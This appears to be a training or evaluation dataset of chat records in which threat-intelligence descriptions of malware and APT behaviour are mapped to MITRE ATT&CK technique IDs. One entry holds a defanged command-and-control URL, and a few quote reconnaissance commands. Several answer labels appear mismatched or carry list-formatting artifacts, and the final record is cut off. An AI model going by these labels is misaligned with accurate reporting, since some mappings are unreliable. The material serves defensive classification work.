- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "There are additional keys within the Registry that can be modified to further roll back the patch and expose unsafe options in Outlook. The following setting can be used to re-enable the original home page tab and roaming home page behavior in the Outlook UI"
- },
- {
- "role": "assistant",
- "content": "T1137.004 - Office Application Startup: Outlook Home Page"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can open the Windows Firewall on the victim’s machine to allow incoming connections."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "From my analyses, I was able to identify http://mdzz2019.noip[.]cn:19931 as its main C2 url. This is a dynamic DNS, meaning the actual IP changes quite frequently. Additionally, on that same url, http://mdzz2019.noip[.]cn:3654/ is used to distribute more versions of this Gh0stRAT sample, along with a .zip file containing ASPXSpy, a web shell"
- },
- {
- "role": "assistant",
- "content": "T1568.001 - Fast Flux DNS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "On July 18, 2018, one day after the AZORult update above was announced, we observed a campaign delivering thousands of messages targeting North America that used the new version of AZORult. The messages used employment-related subjects such as “About a role” and “Job Application”. The attached documents used file names in the format of “firstname.surname_resume.doc"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can use process hollowing for execution."
- },
- {
- "role": "assistant",
- "content": "T1055.012 - Process Injection: Process Hollowing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A typical response from the C2 server is a legitimate-looking webpage containing the string “!DOCTYPE html”, which the malware checks. The malware then locates a Base64-encoded blob, which it decodes and proceeds to load as a shellcode"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WMI permanent event subscriptions can be used to trigger actions when specified conditions are met. Attackers often use this functionality to persist the execution of backdoors at system start up. Subscriptions consist of three core WMI classes: a Filter, a Consumer, and a FilterToConsumerBinding. WMI Consumers specify an action to be performed, including executing a command, running a script, adding an entry to a log, or sending an email. WMI Filters define conditions that will trigger a Consumer, including system startup, the execution of a program, the passing of a specified time and many others. Creating a WMI permanent event subscription requires administrative privileges on a system"
- },
- {
- "role": "assistant",
- "content": "T1546.003 - Event Triggered Execution: Windows Management Instrumentation Event Subscription"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attack starts with a malicious XLS attachment, sent in a phishing email, containing an obfuscated macro that downloads a heavily packed second-stage downloader. The second stage fetches the encrypted third-stage, which includes three layered encrypted Lokibot. After a privilege escalation, the third stage deploys Lokibot"
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses character replacement, environment variables, and XOR encoding to obfuscate code."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Avaddon has collected information about running processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BabyShark has added a Registry key to ensure all future macros are enabled for Microsoft Word and Excel as well as for additional persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Olympic Destroyer will attempt to enumerate mapped network shares to later attempt to wipe all files on those shares."
- },
- {
- "role": "assistant",
- "content": "T1135 - Network Share Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WIRTE has downloaded PowerShell code from the C2 server to be executed."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Based on our analysis, financial organizations in Turkey were targeted via spear phishing emails containing a malicious Microsoft Word document. The document contains an embedded Adobe Flash exploit, which was recently announced by the Korean Internet Security agency"
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT41 attempted to remove evidence of some of its activity by deleting Bash histories."
- },
- {
- "role": "assistant",
- "content": "T1070.003 - Indicator Removal on Host: Clear Command History"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sandworm Team has leased servers from resellers instead of leasing infrastructure directly from hosting companies to enable its operations."
- },
- {
- "role": "assistant",
- "content": "T1583.004 - Server"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "T9000 can take screenshots of the desktop and target application windows, saving them to user directories as one byte XOR encrypted .dat files."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Skidmap has used \"pm.sh\" to download and install its main payload."
- },
- {
- "role": "assistant",
- "content": "T1059.004 - Command and Scripting Interpreter: Bash"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lizar has a module to collect usernames and passwords stored in browsers."
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In the case of a Linux/Ebury backdoor connection, the <version> contains a hexadecimal string of twenty-two (22) characters or more. It embeds an eleven (11) character password that is first encrypted with the client IP address and then encoded as a hexadecimal string; optionally a four (4) byte command may be encrypted and encoded as well after the password"
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Epic searches for anti-malware services running on the victim’s machine and terminates itself if it finds them."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Honeybee gathers a list of processes using the \"tasklist\" command and then is sent back to the control server."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Siloscape mimics CExecSvc.exe privileges by impersonating its main thread and then calls NtSetInformationSymbolicLink on a newly created symbolic link to break out of the container"
- },
- {
- "role": "assistant",
- "content": "T1134.001 - Access Token Manipulation: Token Impersonation/Theft"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Winnti for Windows can use a variant of the sysprep UAC bypass."
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Wscript.exe does a number of things: It deletes the original QakBot.vbs and writes four files to disk in %APPDATA% induce.flac, pep.csv, rhythm.tex and senate.m4a. Senate.m4a is deleted after full process execution"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can execute a task to download a file."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Several Lazarus Group malware families install themselves as new services."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The SolarWinds Orion API is vulnerable to authentication bypass that could allow a remote attacker to execute API commands"
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The PCODE of the virtual machine is packed with the aplib packer"
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "They also add programs to a startup folder that can be referenced with a registry run key. We detected a variant of the Carbanak malware that adds registry entries and keys as an autostart technique. Credentials of existing valid accounts were also abused."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "“desktop.ini” is used to invoke regasm.exe to launch the payload found in C:\\Users\\Public\\Libraries\\core.dll as a hidden window without returning any error codes."
- },
- {
- "role": "assistant",
- "content": "T1622 - Debugger Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "More_eggs has used cmd.exe for execution."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The White Company has taken advantage of a known vulnerability in Microsoft Word (CVE 2012-0158) to execute code."
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Wizard Spider has used networkdll for network discovery and psfin specifically for financial and point of sale indicators. Wizard Spider has also used AdFind and \"nltest/dclist\" to enumerate domain computers, including the domain controller."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "proxy-servers, web-servers, or software update servers. After that, these intermediary servers are used by ProjectSauron as internal proxy nodes for silent and inconspicuous data exfiltration, blending in with high volumes of legitimate traffic"
- },
- {
- "role": "assistant",
- "content": "T1090.001 - Proxy: Internal Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "So attackers specify an external C&C server in the command line and the tool connects to this server using HTTP. This remote server is used as a proxy by attackers: the connection that goes to this server is redirected to the internal network by the tool and any response that the tool gets from a computer in the internal network goes to the C&C server. Thus, attackers can communicate with internal servers that are normally unreachable from the internet"
- },
- {
- "role": "assistant",
- "content": "T1090 - Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The \"net start\" command can be used in Net to find information about Windows services."
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "admin@338 actors used the following command to rename one of their tools to a benign file name: \"ren \"%temp%\\upload\" audiodg.exe\""
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 9: Example Network Communication In the example, the POWRUNER client sends a random GET request to the C2 server and the C2 server sends the random number (99999999990) as a response"
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Exaramel has a command to download a file from a remote server to execute."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KeyBoy installs a service pointing to a malicious DLL dropped to disk."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DustySky has exfiltrated data to the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has the ability to initiate keylogging and screen captures."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "S-Type has provided the ability to execute shell commands on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BendyBear has encrypted payloads using RC4 and XOR."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sidewinder has named malicious files \"rekeywiz.exe\" to match the name of a legitimate Windows executable."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Flagpro has been used to execute the \"ipconfig /all\" command on a victim system."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QuasarRAT has the ability to set file attributes to \"hidden\" to hide files from the compromised user's view in Windows File Explorer."
- },
- {
- "role": "assistant",
- "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SideCopy has used compromised domains to host its malicious payloads."
- },
- {
- "role": "assistant",
- "content": "T1608.001 - Upload Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has been launched by starting iexplore.exe and replacing it with 's payload."
- },
- {
- "role": "assistant",
- "content": "T1055.012 - Process Injection: Process Hollowing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This will also force the victim to re-open the browser using the newly written .lnk file, which is now loaded with Grandoreiro’s malicious extension. This extension will load on every browser startup using this specific .lnk file"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some variants of FakeM use SSL to communicate with C2 servers."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The HTTP request retrieves contents of the files present in the repository with an interesting validation which checks that the retrieved file is a PNG. The file that was earlier retrieved was named “readme.png”; this PNG file has one of the malicious modules embedded in it. It then executes GetNumberOfMethods and saves the result obtained by the module. This file committed to the repo contains the result of the commands executed by the module on the target system. To commit the file the malware makes a PUT HTTP request to Github"
- },
- {
- "role": "assistant",
- "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32 used Mimikatz and customized versions of Windows Credential Dumper to harvest credentials."
- },
- {
- "role": "assistant",
- "content": "T1003.001 - OS Credential Dumping: LSASS Memory"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A tool can encrypt payloads using XOR. malware is also obfuscated using Metasploit’s shikata_ga_nai encoder as well as compressed with LZNT1 compression."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT3 has been known to brute force password hashes to be able to leverage plain text credentials."
- },
- {
- "role": "assistant",
- "content": "T1110.002 - Brute Force: Password Cracking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MirageFox can gather the username from the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Valak has the ability save and execute files as alternate data streams (ADS)."
- },
- {
- "role": "assistant",
- "content": "T1564.004 - Hide Artifacts: NTFS File Attributes"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "First-stage analysis . When the user opens the phishing email, it presents a Spanish social engineering message (\"Payment: Find scheduled payment dates attached\"). The figure below shows a screenshot of one of the emails we looked at. It decrypts the URL for the second-stage from hardcoded bytes, saves it to the \"Templates\" folder, and executes it. Second-stage analysis . The second-stage executable is packed with a Delphi-based packer. The DLL sets a timer, as shown below, which will execute the downloader function periodically. The DLL decodes the hex string using the following steps: We have written a small Python script to decrypt the third stage. The same decryption method was also used to decrypt the hardcoded command and control (C2).The resulting file is also a DLL, which the second stage reflectively loads. Injected DLL analysis (UAC bypass using two techniques) . It checks if `C:\\Windows\\Finex` exists. Decrypting and executing Lokibot . After attempting to bypass the UAC, the third-stage DLL will check if `AutoRunKeyFlag` is set. For this DLL, it is not set. This dropper uses three stages and three layers of encryption to hide its final payload"
- },
- {
- "role": "assistant",
- "content": "T1053 - Scheduled Task/Job"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QUADAGENT encodes C2 communications with base64."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OSX/Shlayer can escalate privileges to root by asking the user for credentials."
- },
- {
- "role": "assistant",
- "content": "T1548.004 - Elevated Execution with Prompt"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "zwShell has used SchTasks for execution."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In August 2019, FireEye released the “Double Dragon” report on our newest graduated threat group, APT41. A China-nexus dual espionage and financially-focused group, APT41 targets industries such as gaming, healthcare, high-tech, higher education, telecommunications, and travel services. APT41 is known to adapt quickly to changes and detections within victim environments, often recompiling malware within hours of incident responder activity. In multiple situations, we also identified APT41 utilizing recently-disclosed vulnerabilities, often weaponzing and exploiting within a matter of days."
- },
- {
- "role": "assistant",
- "content": "T1595.002 - Vulnerability Scanning', 'T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An RTF, an MSI file, a .NET Wrapper and two stages of Shellcode walk into a bar… Our journey begins with an RTF file named “New Salary Structure 2017.doc”, which exploits CVE-2017-0199"
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Patchwork has added the path of its second-stage malware to the startup folder to achieve persistence. One of its file stealers has also persisted by adding a Registry Run key."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ebury has encrypted C2 traffic using the client IP address, then encoded it as a hexadecimal string."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The two dropped artifacts – a payload DLL and a Word document – are written to the “Users\\<Log on User>\\” folder (the document will replace the opened malicious document with clean stub after killing the running Word process"
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "On Tuesday, Jan. 11, 2022, Emotet resumed spamming after its holiday break. The emails continued with links to fake complaint pages, and the pages were sometimes customized to include the recipient’s name. This method was prevalent until Jan. 20."
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link', 'T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ebury can deactivate PAM modules to tamper with the sshd configuration."
- },
- {
- "role": "assistant",
- "content": "T1556.003 - Modify Authentication Process: Pluggable Authentication Modules"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
